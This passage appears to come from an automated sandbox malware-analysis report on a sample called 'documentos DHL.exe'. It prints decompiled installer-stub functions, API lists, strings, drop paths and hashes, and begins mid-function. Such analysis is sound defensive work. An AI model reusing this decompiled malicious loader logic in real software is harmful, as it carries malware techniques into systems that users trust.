					return 0;
				}
				FindClose(_t2);
				return 0x426778;
			}

0x004066fe
0x00406707
0x00000000
0x00406714
0x0040670a
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76522EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76522EE0), ref: 004066FE
FindClose.KERNEL32(00000000), ref: 0040670A

Strings

xgB, xrefs: 004066F4

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8

Uniqueness

Uniqueness Score: -1.00%

Function 0338F535 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

,/Lt, xrefs: 0338F720

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: ,/Lt
API String ID: 0-4078271339
Opcode ID: f1fca6dc0de3648d1e43ededab99234b140305c1df7850de80bcbffdfdcb1181
Instruction ID: 2f7f4464c19f1603ae100139d07f277b04b943f752cd0ea543064968b4edc980
Opcode Fuzzy Hash: f1fca6dc0de3648d1e43ededab99234b140305c1df7850de80bcbffdfdcb1181
Instruction Fuzzy Hash: 74617176A04348CFDB38EF28D8D47DA7BB6EF89790F54841E8C899B601D3318A46CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00403E6C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403E6C(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t144;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x423710 = _t37;
					if(_t118 == 0x110) {
						 *0x42a248 = _t128;
						 *0x423724 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216f0 = _t94;
						E00404345(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x429228);
						 *0x42920c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x423710 = 1;
					}
					_t125 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x42a280;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00404391(0x40b);
						while(1) {
							_t39 =  *0x423710;
							 *0x40a39c =  *0x40a39c + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0x0
							__eflags = _t41 -  *0x42a284;
							if(_t41 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42920c - _t136;
							if( *0x42920c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E004063D2(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404345(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404345(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404345(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x42a2ec - _t136;
							_v32 = _t51;
							if( *0x42a2ec != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404367(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x4216f0, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423724);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x4216f0);
							}
							E0040437A();
							E004063B0(0x423728, E00403E4D());
							E004063D2(0x423728, _t128, _t133,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x423728); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429218); // executed
									 *0x422700 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x42a240,  *_t133 +  *0x429220 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x429218 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404345(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x429218, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42920c - _t136;
									if( *0x42920c != _t136) {
										goto L61;
									}
									ShowWindow( *0x429218, 8);
									E00404391(0x405);
									goto L58;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L61;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x429218);
						 *0x42a248 = _t136;
						EndDialog(_t128,  *0x421ef8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x429218, 0x40f, 0, 1);
						__eflags =  *0x42920c;
						return 0 |  *0x42920c == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x423708, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x423708,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E004043AC(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x429218, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2ec - _t136;
										if( *0x42a2ec == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x421ef8 = 1;
											L21:
											_push(0x78);
											L22:
											E0040431E();
											goto L26;
										}
										E0040140B(_t130);
										 *0x421ef8 = _t130;
										goto L21;
									}
									__eflags =  *0x40a39c - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x429218);
						 *0x429218 = _a12;
						L58:
						_t144 =  *0x425728 - _t136; // 0x0
						if(_t144 == 0 &&  *0x429218 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x425728 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403e75
0x00403e7e
0x00403fbf
0x00403fc3
0x00403fc7
0x00403fc9
0x00403fce
0x00403fd9
0x00403fe4
0x00403fe9
0x00403feb
0x00403fed
0x00403ff0
0x00403ff5
0x00404003
0x00404010
0x00404017
0x00404017
0x00404018
0x00404018
0x0040401d
0x00404023
0x0040402a
0x00404030
0x00404032
0x00404072
0x00404077
0x0040407c
0x0040407c
0x00404081
0x0040408a
0x0040408c
0x00404091
0x00404097
0x0040409b
0x0040409b
0x004040a0
0x004040a6
0x00000000
0x00000000
0x004040b1
0x004040b7
0x00000000
0x00000000
0x004040c0
0x004040c8
0x004040cd
0x004040d0
0x004040d6
0x004040db
0x004040de
0x004040e4
0x004040e9
0x004040ec
0x004040f2
0x004040fa
0x00404100
0x00404106
0x0040410a
0x00404111
0x00404111
0x00404111
0x0040411b
0x0040412d
0x00404139
0x0040413e
0x00404148
0x0040414e
0x00404150
0x00404155
0x00404152
0x00404152
0x00404152
0x00404165
0x0040417d
0x0040417f
0x00404185
0x0040419a
0x00404187
0x00404190
0x00404192
0x00404192
0x004041a0
0x004041b1
0x004041c7
0x004041ce
0x004041d4
0x004041d8
0x004041dd
0x004041df
0x00000000
0x004041e5
0x004041e5
0x004041e7
0x00000000
0x00000000
0x004041ed
0x004041f1
0x00404216
0x0040421c
0x00404222
0x00404224
0x00000000
0x00000000
0x0040424a
0x00404250
0x00404252
0x00404257
0x00000000
0x00000000
0x0040425d
0x00404260
0x00404263
0x0040427a
0x00404286
0x0040429f
0x004042a5
0x004042a9
0x004042ae
0x004042b4
0x00000000
0x00000000
0x004042be
0x004042c9
0x00000000
0x004042c9
0x004041f3
0x004041f9
0x00000000
0x00000000
0x004041ff
0x00404205
0x00000000
0x00000000
0x00000000
0x0040420b
0x004041df
0x004042d6
0x004042e2
0x004042e9
0x00000000
0x00404034
0x00404034
0x00404037
0x0040406a
0x0040406a
0x0040406c
0x00000000
0x00000000
0x00000000
0x0040406c
0x00404039
0x0040403d
0x00404042
0x00404044
0x00000000
0x00000000
0x00404054
0x0040405c
0x00000000
0x00404062
0x00403e90
0x00403e90
0x00403e94
0x00403e99
0x00403ea8
0x00403ea8
0x00403eb1
0x00403eba
0x00403ec5
0x00403ec5
0x00403ed1
0x00403eed
0x00403ef0
0x00403f03
0x00403f09
0x00403fac
0x00000000
0x00403fb5
0x00403f0f
0x00403f1c
0x00403f1e
0x00403f20
0x00403f3f
0x00403f3f
0x00403f42
0x00403f47
0x00403f4a
0x00403f5a
0x00403f5b
0x00403f5d
0x00403f93
0x00403fa6
0x00000000
0x00403fa6
0x00403f5f
0x00403f65
0x00403f7e
0x00403f83
0x00403f85
0x00000000
0x00000000
0x00403f87
0x00403f73
0x00403f73
0x00403f75
0x00403f75
0x00000000
0x00403f75
0x00403f68
0x00403f6d
0x00000000
0x00403f6d
0x00403f4c
0x00403f52
0x00000000
0x00000000
0x00403f54
0x00000000
0x00403f54
0x00403f44
0x00000000
0x00403f44
0x00403f2a
0x00403f31
0x00403f37
0x00403f39
0x00000000
0x00000000
0x00000000
0x00403f39
0x00403ef5
0x00000000
0x00403ed3
0x00403ed9
0x00403ee3
0x004042ef
0x004042ef
0x004042f5
0x00404302
0x00404308
0x00404308
0x00404312
0x00000000
0x00404312
0x00403ed1

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
ShowWindow.USER32(?), ref: 00403EC5
DestroyWindow.USER32 ref: 00403ED9
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
GetDlgItem.USER32(?,?), ref: 00403F16
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
IsWindowEnabled.USER32(00000000), ref: 00403F31
GetDlgItem.USER32(?,00000001), ref: 00403FDF
GetDlgItem.USER32(?,00000002), ref: 00403FE9
SetClassLongW.USER32(?,000000F2,?), ref: 00404003
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
GetDlgItem.USER32(?,00000003), ref: 004040FA
ShowWindow.USER32(00000000,?), ref: 0040411B
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412D
EnableWindow.USER32(?,?), ref: 00404148
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
EnableMenuItem.USER32(00000000), ref: 00404165
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
SetWindowTextW.USER32(?,00423728), ref: 004041CE
ShowWindow.USER32(?,0000000A), ref: 00404302

Strings

(7B, xrefs: 004041AA

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403ABE Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403ABE(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a254;
				_t22 = E0040678A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423728;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E0040627E(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
					__eflags =  *0x423728;
					if(__eflags == 0) {
						E0040627E(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x423728, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004062F7(L"1033", _t73 & 0x0000ffff);
				}
				E00403D94(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes";
				 *0x42a2e0 =  *0x42a25c & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E00405D89(_t90, L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes") != 0) {
					L16:
					if(E00405D89(_t98, _t86) == 0) {
						E004063D2(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a240, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429228 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403D94(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E004054E7(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42920c;
								if( *0x42920c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423708, 5); // executed
							_t39 = E0040671A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040671A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291e0);
								 *0x429204 = _t87;
								RegisterClassW(0x4291e0);
							}
							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403E6C, 0); // executed
							E00403A0E(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a240;
						 *0x4291e4 = E00401000;
						 *0x4291f0 =  *0x42a240;
						 *0x4291f4 = _t30;
						 *0x429204 = 0x40a3b4;
						if(RegisterClassW(0x4291e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281e0;
					E0040627E(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
					_t63 =  *0x4281e0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281e2;
						 *((short*)(E00405CAE(0x4281e2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E004063B0(_t86, E00405C81(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405CCD(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403ac4
0x00403acd
0x00403ad4
0x00403ad6
0x00403aea
0x00403afc
0x00403b05
0x00403b0e
0x00403b15
0x00403b1a
0x00403b21
0x00403b34
0x00403b34
0x00403b3f
0x00403ad8
0x00403ad8
0x00403ae3
0x00403ae3
0x00403b44
0x00403b4e
0x00403b57
0x00403b5c
0x00403b6d
0x00403bff
0x00403c07
0x00403c10
0x00403c10
0x00403c26
0x00403c2c
0x00403c3a
0x00403cbb
0x00403cc3
0x00403ccd
0x00403cd2
0x00403cd8
0x00403d62
0x00403d67
0x00403d69
0x00403d85
0x00000000
0x00403d85
0x00403d6b
0x00403d71
0x00403d79
0x00403d79
0x00000000
0x00403d71
0x00403ce6
0x00403cf1
0x00403cf6
0x00403cf8
0x00403cff
0x00403cff
0x00403d0a
0x00403d12
0x00403d14
0x00403d16
0x00403d1f
0x00403d22
0x00403d28
0x00403d28
0x00403d47
0x00403d58
0x00000000
0x00403d5d
0x00403cc5
0x00403cc7
0x00000000
0x00403c3c
0x00403c3c
0x00403c48
0x00403c52
0x00403c58
0x00403c5d
0x00403c6c
0x00403d8a
0x00403d8a
0x00000000
0x00403d8a
0x00403c7b
0x00403cb6
0x00000000
0x00403cb6
0x00403b73
0x00403b73
0x00403b76
0x00403b78
0x00000000
0x00000000
0x00403b86
0x00403b98
0x00403b9d
0x00403ba6
0x00000000
0x00000000
0x00403bac
0x00403bae
0x00403bbb
0x00403bbb
0x00403bc4
0x00403bca
0x00403bf2
0x00403bfa
0x00000000
0x00403bdc
0x00403bdd
0x00403be6
0x00403bec
0x00403bed
0x00000000
0x00403bed
0x00403be8
0x00403bea
0x00000000
0x00000000
0x00000000
0x00403bea
0x00403bca

APIs

Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7

GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,76523420,"C:\Users\user\Desktop\documentos DHL.exe",00000000), ref: 00403AD8

Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304

lstrcatW.KERNEL32(1033,00423728), ref: 00403B3F
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
GetFileAttributesW.KERNEL32(Call), ref: 00403BDD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes), ref: 00403C26
RegisterClassW.USER32(004291E0), ref: 00403C63
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
ShowWindow.USER32(00000005,00000000), ref: 00403CE6
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
RegisterClassW.USER32(004291E0), ref: 00403D28
DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47

Strings

_Nb, xrefs: 00403C42, 00403CAA
Call, xrefs: 00403B86, 00403B8F, 00403B9D, 00403BEC, 00403BF2
.DEFAULT\Control Panel\International, xrefs: 00403B2A
RichEd32, xrefs: 00403CFA
C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes, xrefs: 00403B4E, 00403B56, 00403BF9, 00403BFF, 00403C0F
RichEd20, xrefs: 00403CEC
.exe, xrefs: 00403BCC
(7B, xrefs: 00403AEA
Control Panel\Desktop\ResourceLocale, xrefs: 00403AF2
"C:\Users\user\Desktop\documentos DHL.exe", xrefs: 00403AC2
C:\Users\user\AppData\Local\Temp\, xrefs: 00403ACA
RichEdit, xrefs: 00403D19
1033, xrefs: 00403ADE, 00403B3A
RichEdit20W, xrefs: 00403D0A, 00403D10

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\documentos DHL.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-222199314
Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D

Uniqueness

Uniqueness Score: -1.00%

Function 00402F14 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00402F14(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42a250 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\documentos DHL.exe", 0x400);
